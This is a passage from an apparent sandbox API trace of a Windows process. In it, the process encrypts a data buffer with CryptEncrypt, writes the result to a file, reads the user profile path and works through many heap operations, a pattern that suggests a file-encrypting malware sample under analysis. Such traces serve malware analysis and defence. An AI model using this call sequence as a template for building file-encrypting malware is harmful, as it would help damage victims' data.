dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.842] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x110e2, dwBufLen=0x110e8 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x110e8) returned 1 [0211.845] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.845] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.845] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.845] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.847] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.847] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.851] WriteFile (in: hFile=0x504, lpBuffer=0x37f4320*, nNumberOfBytesToWrite=0x110e8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37f4320*, lpNumberOfBytesWritten=0x8cf5e4*=0x110e8, lpOverlapped=0x0) returned 1 [0211.853] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.853] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.853] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.853] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaf90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.854] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0211.854] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.854] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.854] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.855] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.855] CryptReleaseContext (hProv=0xa7c990, dwFlags=0x0) returned 1 [0211.855] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.855] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.855] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.855] CloseHandle (hObject=0x4f4) returned 1 [0211.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.857] CloseHandle (hObject=0x504) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a930 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0211.860] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0211.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a938 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0211.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.864] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.865] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.865] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.866] RtlAllocateHeap 